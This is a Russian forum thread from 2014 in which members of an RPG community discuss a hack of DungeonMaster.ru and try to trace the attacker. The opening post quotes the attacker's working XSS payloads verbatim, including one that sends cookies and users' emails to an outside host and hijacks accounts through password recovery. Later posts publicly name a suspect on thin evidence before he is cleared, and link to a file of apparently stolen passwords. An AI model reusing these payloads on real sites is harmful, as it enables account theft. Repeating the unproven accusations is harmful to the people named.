| Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате |
| RPG-Zone.ru форумы > Трактир «Удар копытом по голове» > Заморозка DungeonMaster.ru |
| Автор: Боб - 21.8.2014, 11:24 |
| Так. На ДМ произошли крайне неприятные события. Очень надеюсь, там скоро все поправят. Адекватными мерами, на мой взгляд, являются восстановление сайта и обращение в правоохранительные органы с заявлением о преступлении по ст. 273 УК РФ. Группа ДМ в Фейсбуке (думаю, ее итак все заинтересованные лица знают) тут: https://www.facebook.com/groups/178980498816975/ Помощи они не просили, но если есть что предложить, это было бы правильно. Вейлор: решил выделить это в отдельный топик, и всё-таки обсудить, если будут новости. Я буду писать прямо в пост Боба, всё что становится известно. Update 24.08.2014 1) Ники хакера, по его сообщениям 19-20 августа в чате. http://www.dungeonmaster.ru/Cabinet/?user=ololosha 13.12.13 http://www.dungeonmaster.ru/Cabinet/?user=ololoshasha 19.08.14 http://www.dungeonmaster.ru/Cabinet/?user=ololoshastrikesback 19.08.14 Также поиск ботов даёт такой ник. http://dungeonmaster.ru/Cabinet/?user=notdoneyet 19.08.14 2) Его сообщения из чата. 19'го числа были только проверки - работает ли ява-скрипт. 20го был собственно нанесён удар. http://dungeonmaster.ru/Chat/Logs/19_08_14.txt и http://dungeonmaster.ru/Chat/Logs/20_08_14.txt 17:05 ololoshastrikesback Код <img src='http://eblan.org/wp-content/uploads/2011/04/vlastelin1.jpg' onload="jjavascript:var s = document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://lsd.bicycle-day.com/lsd.js';void(0);" onclick='' /> 17:22 ololoshastrikesback Код <a href='http://nyan.cat' onMouseOver='var s = document.createElement("script");s.type="text/javascript";document.body.appendChild(s);s.src="http://lsd.bicycle-day.com/lsd.js";void(0);'>ссылка</a> 17:48 ololoshasha Код <a href='http://nyan.cat' onMouseOver='document.body.remove(document.body);'>ссылка</a> 20-08-2014 12:53 ololosha Код <a href='http://nyan.cat' onMouseOver='var s = document.createElement("script");s.type="text/javascript";document.body.appendChild(s);s.src="http://ololoshasha.esy.es/poison.php?data=Starting%20"+encodeURIComponent(document.cookie); var iframee=document.createElement("iframe");iframee.style="position:absolute;height:1px;width:1px;z-index:-999;border-width:0px";document.body.appendChild(iframee);iframee.onload=function(){if(window.poisonedd==true){void(0);} else {window.poisonedd=true;var mail = this.contentWindow.document.getElementById("ctl00_mainContent_UserProfile1_txtEmail");var z = document.createElement("script");z.type="text/javascript";document.body.appendChild(z);z.src="http://ololoshasha.esy.es/poison.php?data=OrigMail%20"+encodeURIComponent(mail.value);mail.value = mail.value.toString().split("@")[0]+"@dispostable.com";var w = document.createElement("script");w.type="text/javascript";document.body.appendChild(w);w.src="http://ololoshasha.esy.es/poison.php?data=NewMail%20"+encodeURIComponent(mail.value);window.newmail = mail.value; this.contentWindow.document.getElementById("ctl00_mainContent_btnUpdate").click();var r = document.createElement("script");r.type="text/javascript";document.body.appendChild(r);r.src="http://ololoshasha.esy.es/poison.php?data=Finishing%20"+encodeURIComponent(document.cookie);var iframeee=document.createElement("iframe");iframeee.style="position:absolute;height:1px;width:1px;z-index:-999;border-width:0px";document.body.appendChild(iframeee);iframeee.onload=function(){if(window.poisoneddd==2){void(0);} else if(window.poisoneddd==1) {window.poisoneddd=2;this.contentWindow.document.getElementById("ctl00_mainContent_txtEmail").value=window.newmail;this.contentWindow.document.getElementById("ctl00_mainContent_btnSubmit").click();var r = document.createElement("script");r.type="text/javascript";document.body.appendChild(r);r.src="http://ololoshasha.esy.es/poison.php?data=Finished%20"+encodeURIComponent(document.cookie);} else {window.poisoneddd=1;this.contentWindow.document.getElementById("ctl00_LoginView3_LoginStatus2").click();}};iframeee.src="http://"+document.domain+"/PasswordRecovery.aspx";}};iframee.src="http://"+document.domain+"/EditProfile.aspx";void(0);'>ссылка</a> 3) Мыло для регистрации сайта где лежал скрипт - tlkod@evopo.com - одноразовое, ничего с не вытянуть. |
| Автор: Вейлор - 21.8.2014, 13:53 |
| Я думаю ничего фатального у них не случилось, если админы не протупили. Скорей всего кто-то (хакер) нашёл поля куда можно было что-то писать, но где не отрабатывала фильтрация кода (судя по переписке на ФБ это возможно чат). ДМ это ж кажется во многом самописный проект? Таких полей могло быть несколько. Наверное, хакер сбросил в уязвимое поле сниффер, в результате внедряется в код страницы ява-скрипт код, который исполняется на машине юзера, и отправляет автору сниффера данные, например, пароль в зашифрованном виде и логин. Имея эти данные хакер скорей всего сможет зайти под чужими именами, и если под именем админа мог что-то стереть. Не понятно а) кому это может быть нужно. б) успел ли хакер что-то стереть в) есть ли свежие бек-апы Если что-то стёрто и свежих бек-апов нет, то всё может плохо. Но если бек-апы есть, и с учётом того, что админы ДМ.ру как-то написали такой технически продвинутый сайт, то как минимум они смогут восстановиться, но возможно будет некоторый период простоя. Если повезёт, то они просто включат форумы, ну максимум сбросят всем пароли. Хотя судя по записи на главной, админ решил слиться. |
| Автор: Шнобель - 21.8.2014, 20:24 |
| Цитата(Вейлор) Хотя судя по записи на главной, админ решил слиться. Малахольный он. я сам проверял. пройдет пару дней, успокоится и возьмется за ум. |
| Автор: Вейлор - 21.8.2014, 21:23 |
| Шнобель Цитата(Шнобель) пройдет пару дней Посмотрим, но как пример Ролемансер - полтора года валялся, с похожими причинами, что сейчас у ДМ.ру |
| Автор: Аскетолог - 21.8.2014, 22:08 |
| Хм, тогда, часть игроков/мастеров вернётся к вам, часть уйдёт куда-нибудь ещё(как пример, с тем же Ролом было). Вообще, заявление на главной ДМа - уверенности не придаёт, это да. Ну, поживём - увидим... З.Ы. Согласен с Бобом, обсуждать, какбэ, нечего. |
| Автор: Зерг - 23.8.2014, 18:10 |
| Ракот не решал слиться. В связи с нехваткой времени он хотел передать сайт кому-то другому и сам подолгу отсутствовал и отсутствует онлайн. Хакер этим воспользовался и начал ломать сайт. Что касается статьи 273 ук рф, то она не подходит, никакие вредоносные программы не были использованы для взлома, только недостатки безопасности самого сайта. Другими словами, хакер вошёл не через закрытую дверь, а через дыру в стене, а этого никто не запрещает. |
| Автор: Shooter__Andy - 23.8.2014, 18:33 |
| Зерг Цитата(Зерг) никакие вредоносные программы не были использованы для взлома, только недостатки безопасности самого сайта Разве там не были запущены скрипты, собиравшие инфу? Это попадает уже под определение, ЕМНИП. |
| Автор: Зерг - 23.8.2014, 18:39 |
| Какую инфу ? Он только угонял аккаунты, да и то вручную. Менял почту, используя то, что подтверждение для этого не надо. Как он стёр комментарии и записи с форума я точно не знаю, с аккаунта Фионы вроде. Может кто-то пояснит. |
| Автор: Shooter__Andy - 23.8.2014, 18:52 |
| Ну, я-то не знаю, я там не был :) Я только из того, что прочитал: Цитата Только что мы вновь подверглись атаке от ололоши. Два скрипта были выброшены в чат и в обсуждение DM Tribune - на данный момент я рекомендую не заходить ни туда, ни туда. Скрипты собирают информацию о почте пользователей. |
| Автор: Зерг - 23.8.2014, 19:05 |
| Ну так, потому что сайт не скрывает почту. Банальный запрос позволяет получить его в уязвимом месте - чате, как и было сказано выше Вейлором. Он попросил, ему дали, он ничего не взламывал, поэтому статья не подходит. ( |
| Автор: YellowDragon - 23.8.2014, 19:13 |
| Имхо, не важно как это было сделано, важно, что это уничтожение/доступ чужой информации и доступ к чужой интеллектуальной собственности, например - профилям аккакунтов с возможностью их уничтожения/изменения. Стоило бы и правда обратиться в органы, дабы злоумышленник понимал, что он совершил в любом случае - преступление, не зависимо от того, будут его реально ловить или нет. Такая ситуация может случится на любом ресурсе и она очень неприятна. |
| Автор: Аскетолог - 23.8.2014, 20:30 |
| В действиях Ололоши есть состав преступления(и там не одна статья). Если он об этом не знал, или думал как-то иначе, то чо я могу сказать? У этого "героя", есть крайне опасное заблуждение ) А незнание закона, как известно, вину не облегчает. |
| Автор: Вейлор - 23.8.2014, 22:22 |
| Пока ловить-то особо некого. Я сейчас отписал на Хостингер, чтобы дали данные, какие есть по фейко-сайту Ололоши. Конечно они могут и не ответить на майл, да и Ололоша, если умный, настоящие данные мог не светить. Есть пока один подозреваемый, но пока доказательств особо никаких, так что называть не буду. Админы ДМ.ру IP и почту его пусть посмотрят. Маловероятно, но может он засветил что-нибудь? Любая информация может быть полезна. |
| Автор: Венг - 24.8.2014, 00:39 |
| Есть там статья вполне. И не одна. Свернутый текст Кроме скриптов для кражи акков, там, мягко говоря, рванули две "бомбы", вычистившие форум и обсуждения игр (на ДМе обсуждения отделены от игровых веток и хранятся отдельно). Так что с вредоносными программами там все ок. Но вот делал ли это один человек - вопрос. Ждем информации, переезжаем пока сюда. |
| Автор: Вейлор - 24.8.2014, 01:12 |
| В общем мои подозрения очень близки к уверенности, и если этот тот о ком я думаю, найти его в реале будет не проблема. Сейчас мне нужны доп.данные от хостера фейко-сайта Ололоши (я им написал) и / или от админов ДМ.ру (написал вКонтактик группы http://vk.com/club376658 чтобы дали доп.данные). В первом сообщении буду выкладывать факты, по мере их получения. |
| Автор: Фех - 24.8.2014, 01:26 |
| Вейлор сейчас для меня словно пресонаж "декер" из CP 2020 |
| Автор: Венг - 24.8.2014, 01:29 |
| Цитата(Фех) Вейлор сейчас для меня словно пресонаж "декер" из CP 2020 В СР 2020 нет декеров, там есть нетраннеры, хотя их "орудия труда" называются деками. Декеры это Шэдоуран. Попробую кое-кого спросить насчет IP и т.д. _________________ "Декером в киберпанковских ролевых играх, таких как Cyberpunk 2020 или Shadowrun, называют эксперта-компьютерщика, специализирующийся в работе с киберпространством. В обеих играх для значительных действий в киберпространстве требуется быть декером." http://ru.rpg.wikia.com/wiki/%D0%9F%D1%80%D0%BE%D0%B1%D0%BB%D0%B5%D0%BC%D0%B0_%D1%85%D0%B0%D0%BA%D0%B5%D1%80%D0%B0Фех Вот только корбук СР 2020 считает, что персонаж "эксперт-компьютерщик" там Netrunner. Думаю, корбуку лучше знать. |
| Автор: ZatriX - 24.8.2014, 01:44 |
| Цитата(Зерг) Как он стёр комментарии и записи с форума я точно не знаю, с аккаунта Фионы вроде. Может кто-то пояснит. Полностью чистить ветки может только админ на ДМе, у модера нет таких полномочий. К тому же они почистились некорректно - остались дата комментария и ник запостившегося, было убито собственно тело. Явно скриптово, причем это уже похоже не на джава, а на SQL-инъекцию. Цитата(Вейлор) Наверное, хакер сбросил в уязвимое поле сниффер, в результате внедряется в код страницы ява-скрипт код, который исполняется на машине юзера, и отправляет автору сниффера данные, например, пароль в зашифрованном виде и логин. Имея эти данные хакер скорей всего сможет зайти под чужими именами, и если под именем админа мог что-то стереть. Скрипт в его рабочем состоянии сначала появился в обсуждении модуля DM-Tribune в 13.00 по Москве 20го числа. Представляет из себя картинку белого пикселя, залитую на радикал, которая выполняет javascript по триггеру onLoad, подзватывая исполняемый код со стороннего сайта. Код берет email пользователя, меняет его на сторонний и затребывает смену пароля нв новый адрес, угоняя акк. Примерно в это же время недоработанным скриптом (полагаю этим же) был заблокирован чат. После этого, когда злоумышленник (назовем его так) получил контроль над акком модератора, скрипт был вывешен на главную. Люди, успевшие вернуть акки заблоировали яву на компах и какое-то время еще функционировали. Ближе к ночи был нанесен удар по базам. Такие дела. Айпишники, затребованные выше скину с утра. |
| Автор: Венг - 24.8.2014, 01:47 |
| На всякий случай. Написанному выше верить, Затрикс может предоставить информацию и описанная им ситуация правдива. Если у кого будут вопросы, спрашивайте в ПМ. |
| Автор: Вейлор - 24.8.2014, 02:18 |
| А, к чёрту ;) Давайте только не ломиться в профиль к тому на кого я думаю, пока мы не доказали что к чему на 100%. Вот мои мысли. т.к. для взлома использовались однотипные профили, видно что фантазии на ники не много ololosha ololoshasha ololoshastrikesback и использовался скрипт (что видно из кода в первом сообщении) ведущий на сайт http://ololoshasha.esy.es (это хостер "хостингер"). Но также есть сайт http://ololosha.esy.es (Внимание - пока его связь прямо не доказана с тем что использовался для воровства паролей). Этот сайт выводит на сайт (Не подтвердившаяся информация стёрта) (кстати бесплатный домен в зоне Токелау тоже ребята, готовые просто отдать 500 руб в год за домен, не получают. А вот обычно хакеры и т.п. продвинутые да. И хостинг там тоже "Хостингер" (скорей всего бесплатный), что видно если его пропинговать.). Если будет подтверждение связи ololoshasha.esy.es и ololosha.esy.es (от хостера) или подтверждение что его почта засветилась на ДМ - то это он. Почта (Не подтвердившаяся информация стёрта) (Не подтвердившаяся информация стёрта) Есть кстати ещё и сайт ololo.esy.es - тоже на вид подозрительный (файл с какими-то награбленными видимо паролями). Предполагаемые мотивы - он тоже игрок в ФРПГ, увидел ДМ.ру и решил потренироваться как программист. Возможно на кого-то обиделся. Зерг высказал предположение что это может быть некий Mensch (по словам Зерга мотивы у него есть, и место жительства примерно совпадает.). (Не подтвердившаяся информация стёрта) Сейчас ждём IP'шники от админом ДМ.ру. Проверку мыла. И ответ от Хостингера на моё письмо. |
| Автор: AlarDyce - 24.8.2014, 03:47 |
| О! Если это точно он, то его действия, похоже, носили политическую окраску: меньше, чем за неделю до взлома новичком был запущен трешовый антиутопический модуль, в описании которого Украина сильно пострадала, Менш воспринял это как-то очень близко к сердцу и заявил, что не потерпит и объявляет войну. Всерьез, конечно, никто не принял, но тон у него был очень раздраженно-агрессивный. Сейчас, увы, не поднять, обсужд был почищен, но логи в админке должны остаться: я жалобу скидывал с цитатами. Вот и мотив, короче. |
| Автор: GreyB - 24.8.2014, 07:42 |
| Жесть. Ну вы даете, ребята. За считанные часы вычислили =) |
| Автор: Вейлор - 24.8.2014, 09:09 |
| AlarDyce Если так, то политические мотивы у него жирно прослеживаются в инстаграмме и вКонтактике. Но не обязательно именно Mensch. Возможно это его товарищ (а возможно совпадение вообще). Mensch судя по профилю на ДМ.ру Артём, а этот (Не подтвердившаяся информация стёрта). Кстати, проблема на ДМ.ру, через которую взломали сайт, кажется даже проще чем я думал. Там получается просто работает чистый ява-скрипт в чате, без всяких ухищрений. Может быть есть, конечно, ещё какие-то места. Но это можно проверить (на главную, я думаю, он закинул код, когда уже имел некие более широкие права, а так возможно дырки там нет). На месте админов пока я бы просто отключил чат, и начал тестирование остального сайта. |
| Автор: AlarDyce - 24.8.2014, 10:18 |
| Цитата(Вейлор) Возможно это его товарищ, т.к. Mensch судя по профилю на ДМ.ру Артём, а этот (Не подтвердившаяся информация стёрта). Да, вполне может быть и так. Во всяком случае круг тех, кто мог это сделать, сужается до украинской тусовки. Таки легче жить, когда не все вокруг на подозрении (и это я сейчас не про ксенофобию и "образ врага", а чисто географически). |
| Автор: CheZzter - 24.8.2014, 11:19 |
| Беда в другом, в Украине кабардак, а судить по Российскому закону его придется (ибо преступление совершено на территории РФ). Никто его не выдаст. Эх... |
| Автор: Боб - 24.8.2014, 11:25 |
| Цитата(CheZzter) Беда в другом, в Украине кабардак, а судить по Российскому закону его придется (ибо преступление совершено на территории РФ). Никто его не выдаст. Эх... Для начала нужно, чтобы кто-то, лучше всего владелец сайта хотя бы в полицию обратился. В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще. А уж чем закончится, станут менты заморачиваться с расследованием или не станут - дело десятое. |
| Автор: CheZzter - 24.8.2014, 11:31 |
| Цитата(Боб) Для начала нужно, чтобы кто-то, лучше всего владелец сайта хотя бы в полицию обратился. В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще. А уж чем закончится, станут менты заморачиваться с расследованием или не станут - дело десятое. Не, обратится может любой. Факт публичного по 273 УК РФ был. Заявку от любого могут принять, вопрос кто будет писать, и желательно из места нахождения хостинга сайта территориально (по идее). С отрезвляющим эффектом - полностью согласен. Про заморачиваться скажу прямо: методика расследований таких преступлений в РФ слаба и не разработана должным образом; лицо, предположительно, на Украине; имущество или иные права не были изъяты. Скорее откозняк сделают. Мало по таким составам расследуются дела. из 100 от силы с десяток. |
| Автор: Боб - 24.8.2014, 12:00 |
| Цитата(CheZzter) обратится может любой Просто к владельцу не возникнет вопросов типа "а ты что за хрен с горы". Плюс он же потенциальный потерпевший, а тот "любой" - нет, соответственно и процессуальных прав у него нет. Хостинг у ДМ вроде Мастерхост? Где-то я видел краем глаза, может ошибаюсь. Тогда Москва, ЦАО, не помню точно, Мещанский там район или Басманный. |
| Автор: AlarDyce - 24.8.2014, 12:03 |
| Цитата(Боб) В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще. Вот ни разу не верю при данном конкретном раскладе ни в правосудие, ни в "отрезвляющий эффект", вполне возможно даже, что чувствует себя наш "мини-Герострат" "бойцом невидимого фронта", например. Но вычислить кто это конкретно из юзеров все равно стоит, знание — вещь полезная. |
| Автор: ZatriX - 24.8.2014, 12:16 |
| Отрезвляющий эффект - это битой, например |
| Автор: Аскетолог - 24.8.2014, 12:17 |
| Хм, вообще-то, у пользователей "угнали" их аккаунты, получили доступ к информации личного характера(переписка), и всё это выложили в открытый доступ. Пострадавших-то, как раз, много. Да и нафиг нам доказательная база, которую собрать сложно(потому и отказники, что найти легко - доказать сложно), мы ж не суд. Нам надо знать: кто это сделал. |
| Автор: YellowDragon - 24.8.2014, 13:09 |
| Цитата Для начала нужно, чтобы кто-то, лучше всего владелец сайта хотя бы в полицию обратился. В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще. О том мной речь и велась. Мы взрослые люди таки, и стоит показать, что такие вещи должны наказываться. А не говорить "ну вот, всё равно бесполезно"... бесполезно может и бесполезно, но для труса и это может стать ограничивающим фактором... да и всегда есть нюансы разные. Хотя бы тот же факт необходимости проверки этой ситуации официальными структурами.Но тут надобна инициатива от Ракота, наверное.... |
| Автор: Эол - 24.8.2014, 13:32 |
| Меньш Не из Запорожья, а из Кривого Рога. Он ни разу не хакер, и его ситуация на ДМе волнует не меньше нас. Я (на сайте в прошлом Eol, сейчас Obscure) могу за него поручиться. |
| Автор: ZatriX - 24.8.2014, 13:38 |
| Цитата(Вейлор) на главную, я думаю, он закинул код, когда уже имел некие более широкие права Цитата(ZatriX) После этого, когда злоумышленник (назовем его так) получил контроль над акком модератора, скрипт был вывешен на главную |
| Автор: Вейлор - 24.8.2014, 14:09 |
| Цитата(Эол) Меньш Не из Запорожья, а из Кривого Рога. Он ни разу не хакер, и его ситуация на ДМе волнует не меньше нас Да, это пока просто предположение Зерга. Скорей всего действительно не Меньш. Вот ждём ответа на тикер (Не подтвердившаяся информация стёрта) чтобы подтвердить более вероятное что Ололош это (Не подтвердившаяся информация стёрта) Но кстати если бы спрашивал не левый пользователь (я), а полиция, как говорит Боб, они бы ответили бы точно, а мне могут и не ответить, по идее. Кстати жду помощи админов ДМ.ру. Если бы меня пустили в БД (я ничего не трону) было бы ещё лучше. |
| Автор: Зерг - 24.8.2014, 14:12 |
| Это первое, что пришло в голову, когда я узнал что хакер из Запорожья и он украинский "патриот". Потому что Кривой Рог близок к Запорожью, он мог банально переехать + Меньш тоже такой же "патриот", и мотивы, чтобы ломать ДМ, у него были. Но сейчас я уже тоже сильно сомневаюсь, что это он. |
| Автор: Венг - 24.8.2014, 14:30 |
| Не знаю, что там про Менша, но поручение Эола само по себе - это пять. |
| Автор: Fiona El Tor - 24.8.2014, 19:05 |
| 1. Большое спасибо за участие и проделанную работу. Приятно, что сообщество ролевиков неравнодушно к бедам соседей =) 2. На ДМе все перечисленные аккаунты взломщика были зарегистрированы под другими почтами - в основном вариации на тему "ололош". Почта (Не подтвердившаяся информация стёрта) в этих аккаунтах точно не светилась. Был ли пользователь с такой почтой под неорлолошным ником - сразу быстро сказать трудно, поскольку поиск по мейлу на сайте не предусмотрен, надо листать руками. Этого я сейчас технически сделать не могу, доступ только у Ракота на данный момент, авторизация отключена. 3. IP, как ни странно, у всех ололошиных аккаунтов московский. Провайдер Ростелеком (если не путаю), адрес известен, с ним связались. Да, разумеется, нельзя исключить, что этот человек имеет еще один аккаунт на ДМе, на который заходил не с того доступа, с которого осуществлял взлом. Точно так же вероятным может оказаться, что некий пользователь, обиженный на сайт, организовал эту атаку с привлечением знакомого/полузнакомого хакера ( (Не подтвердившаяся информация стёрта)?) , а не выполнял все собственноручно. Хотя, с другой стороны хакер с засвеченными телефонами, вконтактами и прочими данными выглядит как-то странно. 4. Менш - нет, не Менш. Легкий конфликт на политическую тему в данном случае не аргумент. Менша действительно зовут Артем, и физические данные у него другие. Не говоря уже о том, что не те предпосылки, не тот уровень мести и т.д. (чистая психология, можно рассуждать долго, но в случае Менша я убеждена, что он тут ни при чем) 5. Доступ к базе сейчас только у Ракота, я ему передала, что дружественная РПГ-Зона провела расследование и готова к контакту с администрацией ДМа. Я со своей стороны могу провести определенные изыскания среди профилей игроков, когда сайт откроется для авторизации. Еще раз большое спасибо за поддержку =) |
| Автор: AlarDyce - 24.8.2014, 19:43 |
| Цитата(Fiona El Tor) 4. Менш - нет, не Менш. Легкий конфликт на политическую тему в данном случае не аргумент. Менша действительно зовут Артем, и физические данные у него другие. Не говоря уже о том, что не те предпосылки, не тот уровень мести и т.д. (чистая психология, можно рассуждать долго, но в случае Менша я убеждена, что он тут ни при чем) Ну и хорошо, если не он, во всяком случае кандидата стоило "на зуб попробовать", прежде чем откинуть, как того же Пугало, например — вполне нормальный такой детективчик в духе "Кто убил?" Теперь вопрос был ли ентот "ситх" (sithbein) в тусовке "патриотов". |
| Автор: Вейлор - 24.8.2014, 20:28 |
| Цитата(Fiona El Tor) IP, как ни странно, у всех ололошиных аккаунтов московский. Провайдер Ростелеком А напиши мне эти IP и адреса е-майлов пожалуйста, сюда или в https://rpg-zone.ru/index.php?act=Msg&CODE=04&MID=125. И этого в т.ч. не надо забывать http://dungeonmaster.ru/Cabinet/?user=notdoneyet Сейчас самое интересно что ответят в хостингере. |
| Автор: CheZzter - 24.8.2014, 20:59 |
| Кстати, а о чем намекал Ололош вот этим "You can't kill the rat plague. ... Well that becomes boring." - ? Он намекал, что якобы он чумная крыса, а админы не могут ее убить? все также анализируя сообщение. я пришел к выводу, что хакер просто баловался и его не вела какая-то обида. Могу ошибаться, но все же. |
| Автор: Alpha-00 - 24.8.2014, 21:24 |
| Атака началась вскоре после того, как в обсуждении всплыла тема незащищенности ДМа. На что был дан ответ, что абстрактному хакеру этот ресурс интересен не будет тупо потому, что здесь нет ничего ценного и занимательного, лишь дырка в коде, которой можно воспользоваться, и куча модулей. Буквально на следующий же день появился ололоша. Я не верю в такие совпадения. Не говоря уж о том, что есть люди, которые ОЧЕНЬ СИЛЬНО хотят стать админом DM, но им не дают, а тут такая возможность показать свое умение закрывать дыры. Возможно, взлом и велся из Украины, но организатор этой бойды наверняка кто-то из постоянных пользователей DM'a. Про Ростелеком. Ну, прокси же. Надо быть совсем неумным человеком, чтобы атаку вести с реального IP. Равно как и регистрировать ботов на реальную почту. В общем, ждем информации от хостера. PS: Я, кстати, тоже не думаю, что это Mensch. |
| Автор: CheZzter - 24.8.2014, 21:28 |
| Цитата(Alpha-00) Атака началась вскоре после того, как в обсуждении всплыла тема незащищенности ДМа facepalm. по мне, было очень глупо такое в обсуждах обговаривать -.- Цитата(Alpha-00) Я не верю в такие совпадения. это не совпадение, тут правда за тобой. Цитата(Alpha-00) ОЧЕНЬ СИЛЬНО хотят стать админом DM, но им не дают ну и кто же это, если не секрет. ибо, между прочим, круг сужается еще сильнее... |
| Автор: Fiona El Tor - 24.8.2014, 21:42 |
| Кстати, первый Ололоша был забанен несколько ранее за глупые выходки, которые, впрочем, не несли характер взлома. И у этого первого Ололоши был тот же ай-пи. Допустим, прокси, да. Любимый прокси. И про бота с выбивающимся из общего ряда ником notdoneyet я помню. Тот же ай-пи, почта другая, но, ЕМНИП, не sithbein. Запущенный склероз не позволяет мне вспомнить точнее зубодробительные буквосочетания, но когда включат авторизацию, можно будет все это уточнить. UPD Цитата по мне, было очень глупо такое в обсуждах обговаривать -.- Все намного хуже. Это было обсуждение в чате, а не в локальном обсуждении локальной игры. Поименную благодарность я еще выскажу |
| Автор: CheZzter - 24.8.2014, 21:44 |
| Цитата(Fiona El Tor) первый Ололоша был забанен несколько ранее за глупые выходки вроде за чОрного властелина, да? не наговаривая, но один парень (Федя-ФлорисЦш, мой враг-товарищ) любил поигрывать с этой картинкой. |
| Автор: Fiona El Tor - 24.8.2014, 21:51 |
| Чеззтер, эта картинка бродит по ДМу в качестве локального мема уже давно, Флориша тогда и близко на сайте не было. |
| Автор: Зерг - 24.8.2014, 22:04 |
| Ну взломщика ин реал лайф мы уже нашли, все его контакты вплоть до физического места работы. Приведенных Вейлором доказательств уже достаточно, даже если информация с айпи, почтой, никами не подтвердится. Добавлено через 3 мин. 54 с. Есть еще кое-что интересное. http://ololo.esy.es/WIN-QUM52N8G1KV%20%5bКсюша%5d.txt Может найдете какие-нибудь совпадения. |
| Автор: CheZzter - 24.8.2014, 22:18 |
| Цитата(Fiona El Tor) Чеззтер, эта картинка бродит по ДМу в качестве локального мема уже давно, Флориша тогда и близко на сайте не было. была ж шутка. предупредил, не в целях наговора) |
| Автор: Fiona El Tor - 24.8.2014, 23:14 |
| Зерг, это явно пароли, угнанные у одного человека. И там есть банковские пароли. Приват24 - это Украина. Вряд ли в России актуален приватбанк. |
| Автор: Вейлор - 24.8.2014, 23:30 |
| Цитата(Зерг) Может найдете какие-нибудь совпадения. Там ничего особо интересного (в паролях). Цитата(Зерг) взломщика ин реал лайф мы уже нашли Пока нет уверенности. Я сейчас ещё одну абузу написал, в главную вроде бы контору хостингера, с запросом данных, на этот раз на английском. |
| Автор: Зерг - 25.8.2014, 01:50 |
| Если он обворовал чьи-то банковские счета, это уж точно уголовщина... |
| Автор: CheZzter - 25.8.2014, 09:48 |
| Ну, например, он обворовал. Вот тут вообще никто не будет не причем. тут 158 УК РФ (дадада, 158. где то в пленуме прочитал такие вещи), то тут уже потерпевший только может заяву дать. |
| Автор: Вейлор - 25.8.2014, 10:42 |
| По поводу того файла мы точно не знаем 1) к кому именно относится сайт 2) данные в файле украдены или просто написаны Русскоязычная поддержка пока молчит (Не подтвердившаяся информация стёрта) Англоязычная абуз-поддержка отвечает, но пока отделывается дежурными фразами, что не предоставляют данные. Пока моё письмо последнее. Может ещё что-то ответят. (Не подтвердившаяся информация стёрта) |
| Автор: Lana - 25.8.2014, 11:03 |
| После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет? |
| Автор: CheZzter - 25.8.2014, 11:31 |
| Цитата(Вейлор) Русскоязычная поддержка пока молчит (Не подтвердившаяся информация стёрта) Англоязычная абуз-поддержка отвечает, но пока отделывается дежурными фразами, что не предоставляют данные. Пока моё письмо последнее. Может ещё что-то ответят. ой да навряд ли какая-то поддержка внятно что-то даст. тут только по требованию уважаемых лиц ПО дадут 100%, никак иначе. Цитата(Lana) После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет? не в обиду обитателям РПГ Зоны, я тоже надеюсь, что однажды ДМ поднимется. |
| Автор: AlarDyce - 25.8.2014, 11:35 |
| Цитата(Lana) После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет? Вот ждем сегодняшнего решения о том, кто будет новым техадмином, а он уж по идее и должен сроки обозначить, когда заплатки будут поставлены. |
| Автор: Сорин Марков - 25.8.2014, 11:36 |
| Цитата После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет? Нет. На это надеяться, я думаю, уже не стоит. Лично у меня мало веры в то, что найдется человек, готовый заниматься ДМом. Уж если за все время когда он был рабочий, не нашлось, то теперь, когда нужно приложить адову кучу работы к его восстановлению - тем паче. С теорий о том, что это все дело рук Mensh'a я просто прослезился. Давно так не смеялся. Хотя удивляться тому, что весь взлом выкрасили в политические мотивы не стал. Это было очень даже ожидаемо. |
| Автор: Зерг - 25.8.2014, 11:44 |
| Хоспади, это не было теорией. Это просто первое что пришло в голову и я это в ЛИЧКУ написал. Просто это потом здесь выложили и стали обсуждать. Когда я стал проверять, там у Меньша вообще ни с каких концов не сходится. А по поводу политических мотивов, ты на аккаунт (Не подтвердившаяся информация стёрта) посмотри. |
| Автор: Eretar - 25.8.2014, 11:48 |
| А первый раз ололошу забарили не за то, что он какуую-то игру раз двадцать наблюдателем поставил и в топ читаемых вывел? |
| Автор: ZatriX - 25.8.2014, 11:59 |
| За то. |
| Автор: AlarDyce - 26.8.2014, 10:32 |
| А чего никто не транслирует? Цитата Собственно, пожалуй, можно озвучить все официально. Теперь я, Odinarius, по совместительству Moth, новый админ ДМчика. В течение двух, максимум трех дней я планирую перезапустить сайт с необходимым минимумом защиты. Будем надеяться, этого окажется достаточно, но как бы то ни было, у меня будет два дня на то, чтобы продумать тактику в случае повторения боевых действий. После этих дней я планирую переложить админские полномочия на товарища Инквизитора и удалиться в свое подземелье корпеть над гомункулом - DM v.3. Новости о нем будут возникать на сайте регулярно в последующие недели. О сроках пока промолчу, скажу лишь, что они были заметно укорочены в свете последних событий. Полагаю, что нет никакого смысла устраивать политические перестановки, судя по всему, команда модеров отлично со своими обязанностями справлялась, но это еще мы с Инквизитором обсудим, я полагаю. Как бы пафосно это ни звучало, теперь у нас с вами началась совсем новая эра и новая жизнь. Давайте все постараемся, чтобы она для всех оказалась как можно более приятной и продуктивной. Критического успеха вам всем! |
| Автор: GreyB - 26.8.2014, 10:54 |
| Грей думал все и так в курсе =) даже на ДМ-заглушке висит объявление, что мол работы идут. |
| Автор: AlarDyce - 26.8.2014, 12:10 |
| Таки не все ФБ мониторят постоянно, а новость из серии "власть меняется", как ни крути. Понятно, что Ракот давно уже остыл к своему детищу, но одно дело собираться и думать, а другое — свершившийся факт. |
| Автор: CheZzter - 26.8.2014, 17:05 |
